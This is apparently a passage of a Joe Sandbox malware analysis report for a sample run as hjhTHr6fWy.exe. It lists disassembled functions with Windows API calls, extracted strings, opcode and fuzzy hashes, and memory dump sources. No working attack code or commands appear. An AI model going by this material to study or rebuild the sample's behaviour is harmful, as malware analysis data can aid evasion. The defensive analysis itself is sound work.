Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: Variant$ClearInit
String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
API String ID: 2610073882-100263010
Opcode ID: d1bba89620d90134ce5f364f3bfe0ce037c5d6028353c69fb9a18c34dee1acf9
Instruction ID: e0d7915414ade19a35a22f6925b960bfb7bc3a362f74915736a4c8f038314a77
Opcode Fuzzy Hash: d1bba89620d90134ce5f364f3bfe0ce037c5d6028353c69fb9a18c34dee1acf9
Instruction Fuzzy Hash: 2E41D320508B818ED715DF28C488616BFE1AF16314F088A9DD8EA4F797C7B5E519CBA2

Function 00EE7333 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 77COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(04EC839E), ref: 00EE733D
VariantInit.OLEAUT32 ref: 00EE734C

Strings

2, xrefs: 00EE738C
i, xrefs: 00EE73D0
a, xrefs: 00EE73B0
c, xrefs: 00EE73B8
{, xrefs: 00EE7398
u, xrefs: 00EE7380
}, xrefs: 00EE73A0
f, xrefs: 00EE73CC
q, xrefs: 00EE7370
s, xrefs: 00EE7378
w, xrefs: 00EE7388
e, xrefs: 00EE73C0
g, xrefs: 00EE73C8
y, xrefs: 00EE7390

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: Variant$ClearInit
String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
API String ID: 2610073882-100263010
Opcode ID: 885a00c7e84ae7da989a7025a89a97e93ab19e47f9d502d0f202c93675e0392a
Instruction ID: add468fb5e8eefdc4674ffab718ac38593cdbd1d58e5de5bd931686365f14bc5
Opcode Fuzzy Hash: 885a00c7e84ae7da989a7025a89a97e93ab19e47f9d502d0f202c93675e0392a
Instruction Fuzzy Hash: DE41C220509B818ED715DF28C588616BFE1AF16314F088A8DD8EA4F797C3B5E519CBA2

Function 00ED8680 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 391COMMON

Download Yara Rule

Strings

I\, xrefs: 00ED8B53
D^, xrefs: 00ED8B4B
L!_#, xrefs: 00ED89D4, 00ED89DD
AK, xrefs: 00ED8B3B
8U!W, xrefs: 00ED8945
dE;G, xrefs: 00ED8965

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID:
String ID: 8U!W$AK$D^$I\$L!_#$dE;G
API String ID: 0-1822214113
Opcode ID: 0ed3b3ffed4b9dda1d64e2b210ca4de034a7a3186bd16c0fcd47493ad5fcaa5a
Instruction ID: 673ebe8d19797fb96f4160c0458dd568b9253955d3b194f364782ee9b4f2ca44
Opcode Fuzzy Hash: 0ed3b3ffed4b9dda1d64e2b210ca4de034a7a3186bd16c0fcd47493ad5fcaa5a
Instruction Fuzzy Hash: 56E151B4108344ABD3109F55EA80A1BBBF0FB86B48F50591EF5C9AB351E734C906DBA7

Function 00EE61D5 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 165memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 00EE6253

Strings

0, xrefs: 00EE6414
-, xrefs: 00EE61F6
1, xrefs: 00EE61E6
3, xrefs: 00EE61EE
., xrefs: 00EE61FA
/, xrefs: 00EE61FE

Memory Dump Source

Source File: 0000000E.00000002.3089562939.0000000000EB1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00EB0000, based on PE: true

Associated: 0000000E.00000002.3089372383.0000000000EB0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090147312.0000000000EFD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090296155.0000000000F00000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000E.00000002.3090464824.0000000000F10000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_eb0000_qKLAD7yUjj.jbxd

Similarity

API ID: AllocString
String ID: -$.$/$0$1$3
API String ID: 2525500382-387867814
Opcode ID: c39f40e0917516803280618391005fb3fc42bc0154b0490e8ab2f9a0a2cea849
Instruction ID: 29e6c71550f9853f2d4d63340f95b8f7f37ae5ff5300fe95c3a40c7dd9a5840f
Opcode Fuzzy Hash: c39f40e0917516803280618391005fb3fc42bc0154b0490e8ab2f9a0a2cea849
Instruction Fuzzy Hash: 8B91A060508BC38AC3268B3D8888605FFA16B67234B4887D9E5F55F7E3D360D586C7A6

Analysis Process: hjhTHr6fWy.exePID: 1856, Parent PID: 1712COMMON

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	29
Total number of Limit Nodes:	4

Executed Functions

Function 06483F50 Relevance: 1.8, Strings: 1, Instructions: 524
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 064841E4

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: $]q
API String ID: 0-1007455737
Opcode ID: e84745b6b6d5af0f87e3e82bd295e57051358ad4f1cd0e45186e03fed017e544
Instruction ID: ebbee189892fface7f0c96b602713b9c9f357f2c7bf4e5012fb9f63144e1e687
Opcode Fuzzy Hash: e84745b6b6d5af0f87e3e82bd295e57051358ad4f1cd0e45186e03fed017e544
Instruction Fuzzy Hash: EE126134B002158FDB55EF78C994A9EBBF6BF89700B15816AE805EB365DB34DC42CB90

Function 064867D0 Relevance: .4, Instructions: 417COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 460502c75ae67c5b93438c929fdaf753dae7385547f92100e87529e0413a6e9b
Instruction ID: e448007e037fee64c649cfc68b98196a4cc492990f86639a59857a95d16318a7
Opcode Fuzzy Hash: 460502c75ae67c5b93438c929fdaf753dae7385547f92100e87529e0413a6e9b
Instruction Fuzzy Hash: C3F1B131A002199FDB55EF68D880B9EBBF6EF44300F15856AE405EB3A5DB34ED45CB90

Function 0648A3B7 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f52c628f543b241bb9f162e9f610b339bc6e0dc2471a01268435ba01beb4b89
Instruction ID: 322661225a052bce8a95c4bae9c6b67c9faaa738ba38fce85e42bea5560aa170
Opcode Fuzzy Hash: 4f52c628f543b241bb9f162e9f610b339bc6e0dc2471a01268435ba01beb4b89
Instruction Fuzzy Hash: 09D1F670900318CFCB18EFB4D844A9DBBB2FF8A305F1085A9D51AAB754DB319986CF11

Function 06470D80 Relevance: 20.6, Strings: 16, Instructions: 622
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 06470E02
$]q, xrefs: 06471430
$]q, xrefs: 06470E84
$]q, xrefs: 06471455
$]q, xrefs: 064713A0
$]q, xrefs: 06470F86
$]q, xrefs: 06470E52
$]q, xrefs: 06471461
$]q, xrefs: 06470FAC
$]q, xrefs: 06471336
$]q, xrefs: 06470FB8
$]q, xrefs: 064713EB
$]q, xrefs: 06470F36
$]q, xrefs: 06470E78
$]q, xrefs: 064713AC
$]q, xrefs: 0647137B

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-2551331179
Opcode ID: 738e128c577ee3e7b5c109e016818a943cb0bd2757b699150bc9d4645a105a75
Instruction ID: 252ed0a7a09e7b398a2d1486bb0fc9e23e40ec70a19ea1234d21cf8103e3bdac
Opcode Fuzzy Hash: 738e128c577ee3e7b5c109e016818a943cb0bd2757b699150bc9d4645a105a75
Instruction Fuzzy Hash: A032A370B002458FDB95DB69C854AAEBBF6FF89704B14846AE906DB3A1CB74DC01CB91

Function 06471582 Relevance: 7.8, Strings: 6, Instructions: 337
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$]q, xrefs: 064718E3
$]q, xrefs: 0647182E
$]q, xrefs: 06471A12
$]q, xrefs: 06471A7C
$]q, xrefs: 06471A88
$]q, xrefs: 06471A57

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: 0cbafb742ba5d092e6b44619b564742bea58195b29b78642daf8ec7fba94c37a
Instruction ID: 84fac6bca74fa4925902c638ea417176be6a1fe17cc7e5f693cf6e07b05c6f12
Opcode Fuzzy Hash: 0cbafb742ba5d092e6b44619b564742bea58195b29b78642daf8ec7fba94c37a
Instruction Fuzzy Hash: 0FC1D4347002458FDB599BB8C894AAF7BF6EF89704F18886AD5028B3A1DF79DC05C791

Function 0100D0B8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 0100D136
GetCurrentThread.KERNEL32 ref: 0100D173
GetCurrentProcess.KERNEL32 ref: 0100D1B0
GetCurrentThreadId.KERNEL32 ref: 0100D209

Memory Dump Source

Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 8c3114bfaba0172d023299c3682e3cb6259099de7f7daba0689e82f806325f75
Instruction ID: 9f43324a1378189cf6f0a9d64390fc968627d6154655fb34a4456bc19640ef06
Opcode Fuzzy Hash: 8c3114bfaba0172d023299c3682e3cb6259099de7f7daba0689e82f806325f75
Instruction Fuzzy Hash: DB5158B09003099FEB54DFAAD588BDEBBF1FF48314F208459E159A73A0DB389944CB65

Function 06470598 Relevance: 1.7, Strings: 1, Instructions: 462
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dlPj, xrefs: 0647059C

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: dlPj
API String ID: 0-3272693790
Opcode ID: 73ecdb15269557c3acbb6d44e5260b6758b53a642c51c2d8fc2d3819d4f83477
Instruction ID: ed0e803fff19afa5d723e8c945111e912f18ca3cfabc63dbf3bd5c81648272a8
Opcode Fuzzy Hash: 73ecdb15269557c3acbb6d44e5260b6758b53a642c51c2d8fc2d3819d4f83477
Instruction Fuzzy Hash: 5902DD707407148FDB659F64D854A6EBBB6FF89B04F014859D5028B3A1CF7AEC09CB92

Function 01004248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010059F1

Memory Dump Source

Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a6a25230a1850b47f8d1923c5300d146c52da070b1d5fd9bf51f58b1c454655e
Instruction ID: 4fda9205593994fbca11434c7d1c16f326510ee1eba57aedc14a303c51c91a12
Opcode Fuzzy Hash: a6a25230a1850b47f8d1923c5300d146c52da070b1d5fd9bf51f58b1c454655e
Instruction Fuzzy Hash: 5041F2B0C00719CAEB25DFA9C884B9DBBF5FF49304F20806AD409AB291DB756945CF91

Function 0100593B Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 010059F1

Memory Dump Source

Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: b2551eae13da807867dbcddc354aa692dec4f6b5cc56f9578fc177e4b9f725d4
Instruction ID: 51880cc61ccbf071c183b128530d191128f5c4e2c0d596274f5ea8dd736b32de
Opcode Fuzzy Hash: b2551eae13da807867dbcddc354aa692dec4f6b5cc56f9578fc177e4b9f725d4
Instruction Fuzzy Hash: ED41F3B0C00719CEEB25DFA9C884B9DBBF5FF49304F20805AD448AB251DB75698ACF91

Function 0100D300 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0100D387

Memory Dump Source

Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 821ff7e39137a0ddeb5a6b64add5c415f855d42cbe915071e5a83e5ba57a6a11
Instruction ID: 4c06c95779acdc2ecb96e0ca14673be8cf4a2de66de229308ac6fabda0e36b90
Opcode Fuzzy Hash: 821ff7e39137a0ddeb5a6b64add5c415f855d42cbe915071e5a83e5ba57a6a11
Instruction Fuzzy Hash: 7721E4B59002089FDB10CFAAD584ADEFFF8FB48310F14801AE958A3350C378A940CFA1

Function 064859D8 Relevance: 1.6, Strings: 1, Instructions: 307
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 06485C29

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 3b24f8a95c7dcd008a5ba2b341b0594e252058b588cabb2881ed578bfebb18c7
Instruction ID: 9194c3f52b060aa7d1a26a4b6cab444743037ee15c65de6a1e897c44d1bbc9df
Opcode Fuzzy Hash: 3b24f8a95c7dcd008a5ba2b341b0594e252058b588cabb2881ed578bfebb18c7
Instruction Fuzzy Hash: 66C13934600606CFC759DF59C58096ABBF2FF88310B55C96AD45A8B766D730FC46CB90

Function 0100B01D Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0100B086

Memory Dump Source

Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f7f9cc537d9f187b257f0200c67cf544b0c2baefee161e5fb0cea403761d9c72
Instruction ID: 6a4c70e83d5560f7c6ddf01aa695af70ca90ff44a8dbe08a0a1053e17b220b00
Opcode Fuzzy Hash: f7f9cc537d9f187b257f0200c67cf544b0c2baefee161e5fb0cea403761d9c72
Instruction Fuzzy Hash: 551102B5C003498EDB20DFAAC444ADEFBF5EF89310F10845AD4A9B7650C379A549CFA1

Function 0100B020 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0100B086

Memory Dump Source

Source File: 0000000F.00000002.2925184828.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1000000_hjhTHr6fWy.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 4bc2159fcbe466689f60f574aeb6825693257713e2681988ad0e09ed4498a72d
Instruction ID: 8f34e54770b1db65236f9678399d02b3506a43a59767c79a9d86cd725a897e22
Opcode Fuzzy Hash: 4bc2159fcbe466689f60f574aeb6825693257713e2681988ad0e09ed4498a72d
Instruction Fuzzy Hash: CA11DFB6C003498FDB20DF9AC444A9EFBF4EB89314F10845AD569B7650C379A545CFA1

Function 06471BA0 Relevance: 1.4, Instructions: 1443
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd60803083d3789bda116535b9752141eb3de90cce1f5832571cd81d4bd6b7e
Instruction ID: 14346a1ebbeb3ef7c07af13e195709ec809fd197306967458177fdcecebe09db
Opcode Fuzzy Hash: 7bd60803083d3789bda116535b9752141eb3de90cce1f5832571cd81d4bd6b7e
Instruction Fuzzy Hash: 6EC28030B401189FDB55DF64C950EEEBBB6EF88700F108099E606AB3A5DB71AE45CF61

Function 06483DE0 Relevance: 1.4, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 06483F25

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: e97da623933c039d0c81273daa80a1c0214002282bbf1a4d6203c55295820633
Instruction ID: e21542056b32c4c3b295910eb843e8e4b8f506196fe0f51a8210a891367234f6
Opcode Fuzzy Hash: e97da623933c039d0c81273daa80a1c0214002282bbf1a4d6203c55295820633
Instruction Fuzzy Hash: 7431F0317443204FCB1AAB38A8506AE7BEADFC6310B05447AE009CB755CE39EC07C7A1

Function 064884D8 Relevance: 1.3, Strings: 1, Instructions: 98COMMON

Download Yara Rule

Strings

4']q, xrefs: 064885B1

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 53cdad81299e4a1ee539f6d8eab731558557804366a7a6e7e63c029718b090d9
Instruction ID: 1ac09544b5e87befb616941d7891a94aa5e390bb5c5e40bce161c65fbb023492
Opcode Fuzzy Hash: 53cdad81299e4a1ee539f6d8eab731558557804366a7a6e7e63c029718b090d9
Instruction Fuzzy Hash: 01317C317002148FDB08FB78A8A45AE76E7AFC8210B504539D52ACB395EE359E0287E2

Function 064884C8 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

4']q, xrefs: 064885B1

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 7bf4ae9a800e8342bb03604f17a417d645f2387ba6ff89113cd67d69b0e34a3c
Instruction ID: 383e027cee1c8bdf2722f2c7437f5f3b348df6aebc81ba960b9e5efa0e97da80
Opcode Fuzzy Hash: 7bf4ae9a800e8342bb03604f17a417d645f2387ba6ff89113cd67d69b0e34a3c
Instruction Fuzzy Hash: CE2191307002158FDB09BB7898A556E76E3AFC8200B54493DD42ADB395EE34CE0687E2

Function 0648B358 Relevance: 1.3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

Strings

4']q, xrefs: 0648B399

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: 80e6d79b13b9f5419a08faa38e79c32e9d1c84f09158c701e728a16ada11d28a
Instruction ID: 71880dee622083ffe838a00d59bf67106bfc26deb62444f9ccc68ab851444426
Opcode Fuzzy Hash: 80e6d79b13b9f5419a08faa38e79c32e9d1c84f09158c701e728a16ada11d28a
Instruction Fuzzy Hash: C0019E7490624AAFCB44FFB8E94558C7FB6BF45204F1400AAD845D7361DB341E46CB52

Function 0648B368 Relevance: 1.3, Strings: 1, Instructions: 32COMMON

Download Yara Rule

Strings

4']q, xrefs: 0648B399

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID: 4']q
API String ID: 0-1259897404
Opcode ID: e096adf269ba641b42f162048bae9454ba307c132bddbb298d3e7e22bf2eb09a
Instruction ID: 466c7215cb3c0ba48320505617ed1f53d53e9c067ee768de1ee3bb8acd638b42
Opcode Fuzzy Hash: e096adf269ba641b42f162048bae9454ba307c132bddbb298d3e7e22bf2eb09a
Instruction Fuzzy Hash: 1DF03C74A0120AEFCB04FFB8EA4595CBBB6FF44204F1445AAD806D7364DB345E05CB51

Function 06473838 Relevance: .8, Instructions: 787COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e794d38fb91fd4bd97927c13199d880ccd932af6381de3064853ca893a721b90
Instruction ID: b275b5e16b6f58c7a6b2e4d715207a91570d5268c133f41bbb5347b5d8934035
Opcode Fuzzy Hash: e794d38fb91fd4bd97927c13199d880ccd932af6381de3064853ca893a721b90
Instruction Fuzzy Hash: BD622A74B401149FCB45DF68C994EAEBBF6EF89700F118099E506DB3A6CA71ED40DB60

Function 064700D8 Relevance: .7, Instructions: 676COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eff394fc37ccc561069d08658ae128565b90bc35fe44fa6a37cbe4ebbf3f167f
Instruction ID: 6507a22091d0142299f63e3d0132be97d2856cd78e55f2a67eb9003c5b216d7e
Opcode Fuzzy Hash: eff394fc37ccc561069d08658ae128565b90bc35fe44fa6a37cbe4ebbf3f167f
Instruction Fuzzy Hash: D14279707406298FCB65AF78D450A6EBBA6FFC5704B01095CD5039B3A5CF7AED098B82

Function 064848B8 Relevance: .6, Instructions: 594COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995191554.0000000006480000.00000040.00000800.00020000.00000000.sdmp, Offset: 06480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6480000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61e5039b449a35aeeaa05b93ca230146c5c6e30428a2963a11778c389548bdf
Instruction ID: 49a5f49f2249670cdadbf0f4d697e5d837525326c758cf918fa6fc9d11a42233
Opcode Fuzzy Hash: e61e5039b449a35aeeaa05b93ca230146c5c6e30428a2963a11778c389548bdf
Instruction Fuzzy Hash: C83239347006018FDB59EF29D584A6EBBF6FF88304B1584A9E506CB366DB34EC45CB50

Function 06470610 Relevance: .4, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57af7f705db5d7488b860f9500c60a4c191b06a0adc9b2fcb6407f23a38de658
Instruction ID: 4b2734633ceeb37875d224d814e6e535ccd538846b719ecc4bec245e96271a72
Opcode Fuzzy Hash: 57af7f705db5d7488b860f9500c60a4c191b06a0adc9b2fcb6407f23a38de658
Instruction Fuzzy Hash: 8C02DE707407148FDB559F64C954AAEBBB6FF89B04F004859D9028B3A1CFBAED09CB91

Function 06470688 Relevance: .4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 779a9917111eabc40575ae35349b2a69fdbd6feb4612aae8bf324265abbd34c7
Instruction ID: bd677560c2d8a1b95a7ef89728202b8d84c05b3e6e33186780a919fd99612baa
Opcode Fuzzy Hash: 779a9917111eabc40575ae35349b2a69fdbd6feb4612aae8bf324265abbd34c7
Instruction Fuzzy Hash: 71E1D270B407148FDB559F64C954BAA7BB6FF89B05F00485AD5028B3A1CFBAEC09CB91

Function 06470700 Relevance: .4, Instructions: 352COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a32908c5f9ddaaa8fa6c979730b84eb67917b9b4363fea7d961a5c6b742c9a8
Instruction ID: 99f2e21380922625d6aaf25170b8d72c784148e3f73a1a3a3b201377121fc2e4
Opcode Fuzzy Hash: 0a32908c5f9ddaaa8fa6c979730b84eb67917b9b4363fea7d961a5c6b742c9a8
Instruction Fuzzy Hash: 57D10470B417108FEB559B64C954BAA7BB6FF89B04F00845AD9028B3A1CFBADC05CB91

Function 064700BB Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2995069434.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6470000_hjhTHr6fWy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db2a62660c83a308d4d3a03a61bad906b960cb22a5832788c692238ca60501a9
Instruction ID: 5775701a2ad4bce831aa0e07c48d558df5bcf902eab1ab9e85f2478949477483
Opcode Fuzzy Hash: db2a62660c83a308d4d3a03a61bad906b960cb22a5832788c692238ca60501a9
Instruction Fuzzy Hash: C6C1E670B013049FDB459B64C954BAA7BB7FF89B04F10846AE5028B3A1CFB6DC05CBA1

Function 064848A8 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

